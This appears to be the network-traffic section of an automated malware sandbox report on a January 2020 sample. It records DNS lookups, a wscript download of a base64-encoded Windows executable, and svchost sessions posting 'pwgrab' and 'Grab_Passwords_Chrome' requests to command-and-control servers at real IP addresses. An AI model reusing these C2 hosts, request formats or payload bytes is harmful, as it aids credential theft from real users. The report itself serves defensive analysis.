Jan 20, 2020 14:15:27.692069054 CET	53	59774	8.8.8.8	192.168.0.40
Jan 20, 2020 14:16:05.287641048 CET	58146	53	192.168.0.40	8.8.8.8
Jan 20, 2020 14:16:05.304439068 CET	53	58146	8.8.8.8	192.168.0.40
Jan 20, 2020 14:16:05.314781904 CET	64538	53	192.168.0.40	8.8.8.8
Jan 20, 2020 14:16:05.332173109 CET	53	64538	8.8.8.8	192.168.0.40
Jan 20, 2020 14:16:54.035552979 CET	64999	53	192.168.0.40	8.8.8.8
Jan 20, 2020 14:16:54.069204092 CET	53	64999	8.8.8.8	192.168.0.40
Jan 20, 2020 14:16:54.075773954 CET	61778	53	192.168.0.40	8.8.8.8
Jan 20, 2020 14:16:54.120632887 CET	53	61778	8.8.8.8	192.168.0.40
Jan 20, 2020 14:20:17.798944950 CET	61380	53	192.168.0.40	8.8.8.8
Jan 20, 2020 14:20:17.815460920 CET	53	61380	8.8.8.8	192.168.0.40
Jan 20, 2020 14:20:18.811173916 CET	61380	53	192.168.0.40	8.8.8.8
Jan 20, 2020 14:20:18.828500986 CET	53	61380	8.8.8.8	192.168.0.40
Jan 20, 2020 14:20:19.825377941 CET	61380	53	192.168.0.40	8.8.8.8
Jan 20, 2020 14:20:19.842108011 CET	53	61380	8.8.8.8	192.168.0.40
Jan 20, 2020 14:20:21.837698936 CET	61380	53	192.168.0.40	8.8.8.8
Jan 20, 2020 14:20:21.853940010 CET	53	61380	8.8.8.8	192.168.0.40
Jan 20, 2020 14:20:25.846895933 CET	61380	53	192.168.0.40	8.8.8.8
Jan 20, 2020 14:20:25.863934040 CET	53	61380	8.8.8.8	192.168.0.40

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Jan 20, 2020 14:16:05.287641048 CET	192.168.0.40	8.8.8.8	0xa27	Standard query (0)	api.ipify.org	A (IP address)	IN (0x0001)
Jan 20, 2020 14:16:05.314781904 CET	192.168.0.40	8.8.8.8	0xade7	Standard query (0)	api.ipify.org	A (IP address)	IN (0x0001)
Jan 20, 2020 14:16:54.035552979 CET	192.168.0.40	8.8.8.8	0x15f5	Standard query (0)	62.52.17.84.zen.spamhaus.org	A (IP address)	IN (0x0001)
Jan 20, 2020 14:16:54.075773954 CET	192.168.0.40	8.8.8.8	0xc299	Standard query (0)	62.52.17.84.cbl.abuseat.org	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Jan 20, 2020 14:16:05.304439068 CET	8.8.8.8	192.168.0.40	0xa27	No error (0)	api.ipify.org	nagano-19599.herokussl.com		CNAME (Canonical name)	IN (0x0001)
Jan 20, 2020 14:16:05.304439068 CET	8.8.8.8	192.168.0.40	0xa27	No error (0)	nagano-19599.herokussl.com	elb097307-934924932.us-east-1.elb.amazonaws.com		CNAME (Canonical name)	IN (0x0001)
Jan 20, 2020 14:16:05.304439068 CET	8.8.8.8	192.168.0.40	0xa27	No error (0)	elb097307-934924932.us-east-1.elb.amazonaws.com		54.204.26.223	A (IP address)	IN (0x0001)
Jan 20, 2020 14:16:05.304439068 CET	8.8.8.8	192.168.0.40	0xa27	No error (0)	elb097307-934924932.us-east-1.elb.amazonaws.com		184.73.165.106	A (IP address)	IN (0x0001)
Jan 20, 2020 14:16:05.304439068 CET	8.8.8.8	192.168.0.40	0xa27	No error (0)	elb097307-934924932.us-east-1.elb.amazonaws.com		54.235.203.7	A (IP address)	IN (0x0001)
Jan 20, 2020 14:16:05.304439068 CET	8.8.8.8	192.168.0.40	0xa27	No error (0)	elb097307-934924932.us-east-1.elb.amazonaws.com		54.225.169.250	A (IP address)	IN (0x0001)
Jan 20, 2020 14:16:05.304439068 CET	8.8.8.8	192.168.0.40	0xa27	No error (0)	elb097307-934924932.us-east-1.elb.amazonaws.com		54.225.71.235	A (IP address)	IN (0x0001)
Jan 20, 2020 14:16:05.304439068 CET	8.8.8.8	192.168.0.40	0xa27	No error (0)	elb097307-934924932.us-east-1.elb.amazonaws.com		107.22.239.146	A (IP address)	IN (0x0001)
Jan 20, 2020 14:16:05.304439068 CET	8.8.8.8	192.168.0.40	0xa27	No error (0)	elb097307-934924932.us-east-1.elb.amazonaws.com		54.235.220.229	A (IP address)	IN (0x0001)
Jan 20, 2020 14:16:05.304439068 CET	8.8.8.8	192.168.0.40	0xa27	No error (0)	elb097307-934924932.us-east-1.elb.amazonaws.com		54.243.147.226	A (IP address)	IN (0x0001)
Jan 20, 2020 14:16:05.332173109 CET	8.8.8.8	192.168.0.40	0xade7	No error (0)	api.ipify.org	nagano-19599.herokussl.com		CNAME (Canonical name)	IN (0x0001)
Jan 20, 2020 14:16:05.332173109 CET	8.8.8.8	192.168.0.40	0xade7	No error (0)	nagano-19599.herokussl.com	elb097307-934924932.us-east-1.elb.amazonaws.com		CNAME (Canonical name)	IN (0x0001)
Jan 20, 2020 14:16:05.332173109 CET	8.8.8.8	192.168.0.40	0xade7	No error (0)	elb097307-934924932.us-east-1.elb.amazonaws.com		54.235.220.229	A (IP address)	IN (0x0001)
Jan 20, 2020 14:16:05.332173109 CET	8.8.8.8	192.168.0.40	0xade7	No error (0)	elb097307-934924932.us-east-1.elb.amazonaws.com		54.243.147.226	A (IP address)	IN (0x0001)
Jan 20, 2020 14:16:05.332173109 CET	8.8.8.8	192.168.0.40	0xade7	No error (0)	elb097307-934924932.us-east-1.elb.amazonaws.com		184.73.201.169	A (IP address)	IN (0x0001)
Jan 20, 2020 14:16:05.332173109 CET	8.8.8.8	192.168.0.40	0xade7	No error (0)	elb097307-934924932.us-east-1.elb.amazonaws.com		107.22.239.146	A (IP address)	IN (0x0001)
Jan 20, 2020 14:16:05.332173109 CET	8.8.8.8	192.168.0.40	0xade7	No error (0)	elb097307-934924932.us-east-1.elb.amazonaws.com		54.225.71.235	A (IP address)	IN (0x0001)
Jan 20, 2020 14:16:05.332173109 CET	8.8.8.8	192.168.0.40	0xade7	No error (0)	elb097307-934924932.us-east-1.elb.amazonaws.com		54.235.203.7	A (IP address)	IN (0x0001)
Jan 20, 2020 14:16:05.332173109 CET	8.8.8.8	192.168.0.40	0xade7	No error (0)	elb097307-934924932.us-east-1.elb.amazonaws.com		23.21.50.37	A (IP address)	IN (0x0001)
Jan 20, 2020 14:16:05.332173109 CET	8.8.8.8	192.168.0.40	0xade7	No error (0)	elb097307-934924932.us-east-1.elb.amazonaws.com		184.73.165.106	A (IP address)	IN (0x0001)
Jan 20, 2020 14:16:54.069204092 CET	8.8.8.8	192.168.0.40	0x15f5	Name error (3)	62.52.17.84.zen.spamhaus.org	none	none	A (IP address)	IN (0x0001)
Jan 20, 2020 14:16:54.120632887 CET	8.8.8.8	192.168.0.40	0xc299	No error (0)	62.52.17.84.cbl.abuseat.org		127.0.0.2	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

api.ipify.org

5.2.78.43

185.195.237.14

203.176.135.102:8082

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.0.40	49188	54.204.26.223	443	C:\Windows\System32\svchost.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.0.40	49189	5.2.78.43	443	C:\Windows\System32\svchost.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
10	192.168.0.40	49199	5.2.78.43	443	C:\Windows\System32\svchost.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
11	192.168.0.40	49200	5.2.78.43	443	C:\Windows\System32\svchost.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
12	192.168.0.40	49201	5.2.78.43	443	C:\Windows\System32\svchost.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
13	192.168.0.40	49202	5.2.78.43	443	C:\Windows\System32\svchost.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
14	192.168.0.40	49204	5.2.78.43	443	C:\Windows\System32\svchost.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
15	192.168.0.40	49205	5.2.78.43	443	C:\Windows\System32\svchost.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
16	192.168.0.40	49207	5.2.78.43	443	C:\Windows\System32\svchost.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
17	192.168.0.40	49206	5.2.78.43	443	C:\Windows\System32\svchost.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
18	192.168.0.40	49208	5.2.78.43	443	C:\Windows\System32\svchost.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
19	192.168.0.40	49209	5.2.78.43	443	C:\Windows\System32\svchost.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.0.40	49190	5.2.78.43	443	C:\Windows\System32\svchost.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
20	192.168.0.40	49186	185.195.237.14	80	C:\Windows\System32\svchost.exe

Timestamp	kBytes transferred	Direction	Data
Jan 20, 2020 14:13:55.265165091 CET	0	OUT	GET /21RWq/jucE4.php?zs=s20&ed=431846743&rnx=4723711 HTTP/1.1 Accept: / User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.10.3945.88 Safari/537.36 Accept-Language: de-ch UA-CPU: AMD64 Accept-Encoding: gzip, deflate Host: 185.195.237.14 Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
21	185.195.237.14	80	192.168.0.40	49186	C:\Windows\System32\wscript.exe

Timestamp	kBytes transferred	Direction	Data
Jan 20, 2020 14:13:55.326801062 CET	1	IN	HTTP/1.1 200 OK Date: Mon, 20 Jan 2020 13:13:55 GMT Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16 X-Powered-By: PHP/5.4.16 Content-Transfer-Encoding: base64 Content-Disposition: attachment; filename=Bx6ECqoJ2.txt Pragma: public Expires: 0 Cache-Control: must-revalidate, post-check=0, pre-check=0 Content-Length: 316809 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/plain; charset=us-ascii
Jan 20, 2020 14:13:55.326831102 CET	2	IN	Data Raw: 54 56 71 51 41 41 4d 41 41 41 41 45 41 41 41 41 2f 2f 38 41 41 4c 67 41 41 41 41 41 41 41 41 41 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 36 41 Data Ascii: TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA6AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAADTZVgnlwQ2dJcENnSXBDZ0lwQ2dJIENnT1GyV0nwQ2dBQYOHSWBDZ0fxs8dJwENnR/GzJ0kAQ
Jan 20, 2020 14:13:55.326853037 CET	3	IN	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Jan 20, 2020 14:13:55.327481985 CET	4	IN	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Jan 20, 2020 14:13:55.327503920 CET	6	IN	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Jan 20, 2020 14:13:55.327758074 CET	7	IN	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Jan 20, 2020 14:13:55.327789068 CET	8	IN	Data Raw: 44 61 67 6c 56 55 2f 2f 57 61 67 4e 71 43 56 56 54 2f 39 5a 71 41 32 6f 4a 56 56 50 2f 31 6d 6f 44 61 67 6c 56 55 2f 2f 57 61 67 4e 71 43 56 56 54 2f 39 5a 71 41 32 6f 4a 56 56 50 2f 31 6d 6f 44 61 67 6c 56 55 2f 2f 57 61 67 4e 71 43 56 56 54 2f Data Ascii: DaglVU//WagNqCVVT/9ZqA2oJVVP/1moDaglVU//WagNqCVVT/9ZqA2oJVVP/1moDaglVU//WagNqCVVT/9ZqA2oJVVP/1moDaglVU//WagNqCVVT/9ZqA2oJVVP/1moDaglVU//WagNqCVVT/9aLRyCLfySLdCQci2wkEAPGA/473XMoiUQkHItEJByLAAPGUP90JCToEhUAAFmFwFl0CoNEJBwEQzvdct473XUEM8DrDQ+3BF
Jan 20, 2020 14:13:55.327824116 CET	10	IN	Data Raw: 65 4c 38 50 39 56 37 4c 2b 63 55 45 41 41 69 55 58 6b 56 2b 67 74 45 67 41 41 57 56 43 4e 52 63 78 58 55 49 31 46 78 46 44 6f 66 66 33 2f 2f 77 2b 32 77 49 31 49 50 34 32 38 41 4e 34 48 41 41 43 4a 44 53 42 51 51 41 43 4e 69 50 38 50 41 41 43 4a Data Ascii: eL8P9V7L+cUEAAiUXkV+gtEgAAWVCNRcxXUI1FxFDoff3//w+2wI1IP428AN4HAACJDSBQQACNiP8PAACJDSRQQACJffD/VdQr94s9jDJAAFNomFBAAIlF7P/XWVChJFBAAIDMIFD/dfBT/3Xs/1Xgi03k/3XwA86JRehRUP9V3IPEDFNomFBAAP/XWVChJFBAAIDMIFBWU/917P9V4FaL+P915Ff/VdyDxAyNRaT/dfD/dehQ6
Jan 20, 2020 14:13:55.328098059 CET	11	IN	Data Raw: 41 43 64 7a 76 38 41 75 2f 2f 2f 41 41 44 48 68 72 41 41 41 41 41 41 67 50 38 41 69 5a 36 30 41 41 41 41 55 34 76 50 78 34 61 34 41 41 41 41 2f 77 44 2f 41 4f 68 4e 42 67 41 41 61 41 42 54 51 41 43 4c 7a 2f 39 31 35 49 6c 46 36 46 50 6f 4f 67 59 Data Ascii: ACdzv8Au///AADHhrAAAAAAgP8AiZ60AAAAU4vPx4a4AAAA/wD/AOhNBgAAaABTQACLz/915IlF6FPoOgYAAGjoUkAAi8//dfD/dejoKAYAAGjQUkAAi8//dfD/dejoFgYAAGi4UkAAi8//dfD/dejoBAYAAGigUkAAi8//dfD/dejo8gUAAGiYUkAAi8//deRT6OIFAABokFJAAIvP/3XkiUXoU+jPBQAAi13waHhSQABTUIvP
Jan 20, 2020 14:13:55.328222990 CET	12	IN	Data Raw: 41 50 39 32 47 4f 69 46 43 67 41 41 69 38 32 4c 2b 4f 68 32 43 67 41 41 68 63 42 31 4b 34 31 47 48 47 6a 41 77 4d 41 41 55 49 76 50 36 46 77 4b 41 41 42 71 41 59 76 50 36 45 30 4b 41 41 43 4c 48 32 6f 49 2f 78 57 77 4d 6b 41 41 55 49 76 50 2f 31 Data Ascii: AP92GOiFCgAAi82L+Oh2CgAAhcB1K41GHGjAwMAAUIvP6FwKAABqAYvP6E0KAACLH2oI/xWwMkAAUIvP/1M462JqAVuEXhB0NPZGDAN0Kf91SI1GHIvPUOglCgAAU4vP6BcKAACLB/91VIvP/1A4U1aLzeg8AAAAhF4QdTD2RgwDdCr/dUiNRhyLz1Do8QkAAFOLz+jjCQAAiwf/dVCLz/9QOGoAVovN6AcAAABfXl1bwgQAuEQ
Jan 20, 2020 14:13:55.375087023 CET	14	IN	Data Raw: 2f 31 32 6f 47 69 55 55 49 36 44 34 48 41 41 42 5a 69 6b 73 46 55 50 37 42 69 45 67 46 69 6b 30 4d 69 45 67 45 69 30 30 49 5a 6f 6c 49 41 6d 61 4c 55 77 4a 52 61 46 45 42 41 41 42 6d 69 52 44 2f 64 69 44 2f 31 34 74 64 43 46 39 6d 69 38 4e 65 57 Data Ascii: /12oGiUUI6D4HAABZiksFUP7BiEgFik0MiEgEi00IZolIAmaLUwJRaFEBAABmiRD/diD/14tdCF9mi8NeW13CDABRUVNVD7dcJBRWV4s93DJAAGoAvVABAACL8VNV/3Yg/9dqAGoAaEYBAACJRCQc/3Yg/9eDZCQcAEM72IlEJBR9IGoAU1X/diD/14tMJBCKQAU6QQV2C/9EJBxDO1wkFHzgi0QkHF9eXVtZWcIEAFFTVVaDTC

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
22	192.168.0.40	49203	203.176.135.102	8082	C:\Windows\System32\svchost.exe

Timestamp	kBytes transferred	Direction	Data
Jan 20, 2020 14:21:01.510344982 CET	1671	OUT	POST /red4/141700_W617601.8B806DE991D43AE26D6F91E8AD26588D/83/ HTTP/1.1 Accept: / Content-Type: multipart/form-data; boundary=---------CVWRWQYCSROXPZEU Connection: Close User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E) Host: 203.176.135.102:8082 Content-Length: 301 Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
23	203.176.135.102	8082	192.168.0.40	49203	C:\Windows\System32\svchost.exe

Timestamp	kBytes transferred	Direction	Data
Jan 20, 2020 14:21:01.934410095 CET	1673	IN	HTTP/1.1 200 OK connection: close server: Cowboy date: Mon, 20 Jan 2020 13:21:01 GMT content-length: 3 Content-Type: text/plain Data Raw: 2f 31 2f Data Ascii: /1/

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.0.40	49191	5.2.78.43	443	C:\Windows\System32\svchost.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.0.40	49192	5.2.78.43	443	C:\Windows\System32\svchost.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.0.40	49194	5.2.78.43	443	C:\Windows\System32\svchost.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
6	192.168.0.40	49195	5.2.78.43	443	C:\Windows\System32\svchost.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
7	192.168.0.40	49196	5.2.78.43	443	C:\Windows\System32\svchost.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
8	192.168.0.40	49197	5.2.78.43	443	C:\Windows\System32\svchost.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
9	192.168.0.40	49198	5.2.78.43	443	C:\Windows\System32\svchost.exe

Timestamp	kBytes transferred	Direction	Data

HTTPS Packets

Timestamp	Source IP	Source Port	Dest IP	Dest Port	Subject	Issuer	Not Before	Not After
Jan 20, 2020 14:16:05.717243910 CET	54.204.26.223	443	192.168.0.40	49188	CN=*.ipify.org, OU=PositiveSSL Wildcard, OU=Domain Control Validated CN=The Universe Security Company Ltd, O=The Universe Security Company Ltd, L=San Francisco, ST=California, C=US	CN=The Universe Security Company Ltd, O=The Universe Security Company Ltd, L=San Francisco, ST=California, C=US CN=The Universe Security Company Ltd, O=The Universe Security Company Ltd, L=San Francisco, ST=California, C=US	Sun Jan 19 14:16:05 CET 2020 Tue Mar 17 15:16:38 CET 2015	Mon Jan 18 14:16:05 CET 2021 Thu Mar 09 15:16:38 CET 2045
Jan 20, 2020 14:16:05.717243910 CET	54.204.26.223	443	192.168.0.40	49188	CN=The Universe Security Company Ltd, O=The Universe Security Company Ltd, L=San Francisco, ST=California, C=US	CN=The Universe Security Company Ltd, O=The Universe Security Company Ltd, L=San Francisco, ST=California, C=US	Tue Mar 17 15:16:38 CET 2015	Thu Mar 09 15:16:38 CET 2045
Jan 20, 2020 14:19:03.866270065 CET	5.2.78.43	443	192.168.0.40	49189	CN=example.com, OU=IT Department, O=Global Security, L=London, ST=London, C=GB CN=The Universe Security Company Ltd, O=The Universe Security Company Ltd, L=San Francisco, ST=California, C=US	CN=The Universe Security Company Ltd, O=The Universe Security Company Ltd, L=San Francisco, ST=California, C=US CN=The Universe Security Company Ltd, O=The Universe Security Company Ltd, L=San Francisco, ST=California, C=US	Sun Jan 19 14:19:03 CET 2020 Tue Mar 17 15:16:38 CET 2015	Mon Jan 18 14:19:03 CET 2021 Thu Mar 09 15:16:38 CET 2045
Jan 20, 2020 14:19:03.866270065 CET	5.2.78.43	443	192.168.0.40	49189	CN=The Universe Security Company Ltd, O=The Universe Security Company Ltd, L=San Francisco, ST=California, C=US	CN=The Universe Security Company Ltd, O=The Universe Security Company Ltd, L=San Francisco, ST=California, C=US	Tue Mar 17 15:16:38 CET 2015	Thu Mar 09 15:16:38 CET 2045

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.0.40	49188	54.204.26.223	443	C:\Windows\System32\svchost.exe

Timestamp	Direction	Data
2020-01-20 13:16:05 UTC	OUT	GET /?format=text HTTP/1.1 Connection: Keep-Alive User-Agent: curl/7.67.0 Host: api.ipify.org
2020-01-20 13:16:05 UTC	IN	HTTP/1.1 200 OK Server: Cowboy Connection: close Content-Type: text/plain Vary: Origin Date: Mon, 20 Jan 2020 13:16:05 GMT Content-Length: 11 Via: 1.1 vegur
2020-01-20 13:16:05 UTC	IN	Data Raw: 38 34 2e 31 37 2e 35 32 2e 36 32 Data Ascii: 84.17.52.62

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.0.40	49189	5.2.78.43	443	C:\Windows\System32\svchost.exe

Timestamp	Direction	Data
2020-01-20 13:19:03 UTC	OUT	GET /red4/141700_W617601.8B806DE991D43AE26D6F91E8AD26588D/5/spk/ HTTP/1.1 Connection: Keep-Alive User-Agent: curl/7.67.0 Host: 5.2.78.43
2020-01-20 13:19:18 UTC	IN	HTTP/1.1 200 OK Server: nginx/1.6.2 Date: Mon, 20 Jan 2020 13:19:16 GMT Content-Type: application/octet-stream Content-Length: 224 Connection: close
2020-01-20 13:19:18 UTC	IN	Data Raw: 30 e2 b3 a7 9d 04 3b df 10 87 88 29 8e 1b fe d3 9a 88 8f 21 89 7d c5 99 eb 27 5b ff 6d 17 70 2c 1e 9f 61 a8 05 6a 1a 9e dc 0a 6c fe 95 82 42 61 5c 94 15 d3 39 24 3f 08 f7 c4 ab 04 82 ec 7c e5 f8 d2 e8 a6 39 05 13 f1 4c dd 6c 82 d8 9b 48 d1 15 cb 93 22 b7 c2 57 a6 5c 53 2a 88 f1 d0 b2 85 52 89 7b 95 25 7e 3a 20 e0 03 cb 8a ec 27 50 af 34 29 c6 aa 75 64 d7 09 4f 07 e8 87 29 13 b6 e9 3f 01 92 85 57 5d 61 15 82 64 38 28 29 83 4f 07 04 5d 0a 50 2c 91 26 7f 1b 29 d6 9e 7c a2 2f d6 fc ca d5 de 48 88 39 ae 2b b0 14 b9 ae 1e 3a 5a 28 60 76 e7 c8 23 da 8d 43 e3 71 eb 77 9f 76 a4 f5 93 04 82 cc 0c 29 93 01 d2 80 c5 09 e9 7a e5 95 b3 11 0a 19 63 ef 4a bf 27 53 1c 85 07 e8 6d Data Ascii: 0;)!}'[mp,ajlBa\9$?\|9LlH"W\S*R{%~: 'P4)udO)?W]ad8()O]P,&)\|/H9+:Z(`v#Cqwv)zcJ'Sm

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
10	192.168.0.40	49199	5.2.78.43	443	C:\Windows\System32\svchost.exe

Timestamp	kBytes transferred	Direction	Data
2020-01-20 13:20:46 UTC	5	OUT	POST /red4/141700_W617601.8B806DE991D43AE26D6F91E8AD26588D/64/pwgrab/DEBG/browser/ HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=------Boundary019AE0C5 User-Agent: curl/7.67.0 Content-Length: 129 Host: 5.2.78.43
2020-01-20 13:20:46 UTC	5	OUT	Data Raw: 2d Data Ascii: -
2020-01-20 13:20:46 UTC	5	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 42 6f 75 6e 64 61 72 79 30 31 39 41 45 30 43 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 69 6e 66 6f 22 0d 0a 0d 0a 47 72 61 62 5f 50 61 73 73 77 6f 72 64 73 5f 43 68 72 6f 6d 65 28 31 29 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 42 6f 75 6e 64 61 72 79 30 31 39 41 45 30 43 35 2d 2d 0d 0a 0d 0a Data Ascii: -------Boundary019AE0C5Content-Disposition: form-data; name="info"Grab_Passwords_Chrome(1)--------Boundary019AE0C5--
2020-01-20 13:20:56 UTC	7	IN	HTTP/1.1 200 OK Server: nginx/1.6.2 Date: Mon, 20 Jan 2020 13:20:55 GMT Content-Type: text/plain Content-Length: 3 Connection: close
2020-01-20 13:20:56 UTC	7	IN	Data Raw: 2f 31 2f Data Ascii: /1/

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
11	192.168.0.40	49200	5.2.78.43	443	C:\Windows\System32\svchost.exe

Timestamp	kBytes transferred	Direction	Data
2020-01-20 13:20:49 UTC	6	OUT	POST /red4/141700_W617601.8B806DE991D43AE26D6F91E8AD26588D/64/pwgrab/DEBG/browser/ HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=------Boundary019AEC78 User-Agent: curl/7.67.0 Content-Length: 129 Host: 5.2.78.43
2020-01-20 13:20:49 UTC	6	OUT	Data Raw: 2d Data Ascii: -
2020-01-20 13:20:49 UTC	6	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 42 6f 75 6e 64 61 72 79 30 31 39 41 45 43 37 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 69 6e 66 6f 22 0d 0a 0d 0a 47 72 61 62 5f 50 61 73 73 77 6f 72 64 73 5f 43 68 72 6f 6d 65 28 32 29 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 42 6f 75 6e 64 61 72 79 30 31 39 41 45 43 37 38 2d 2d 0d 0a 0d 0a Data Ascii: -------Boundary019AEC78Content-Disposition: form-data; name="info"Grab_Passwords_Chrome(2)--------Boundary019AEC78--

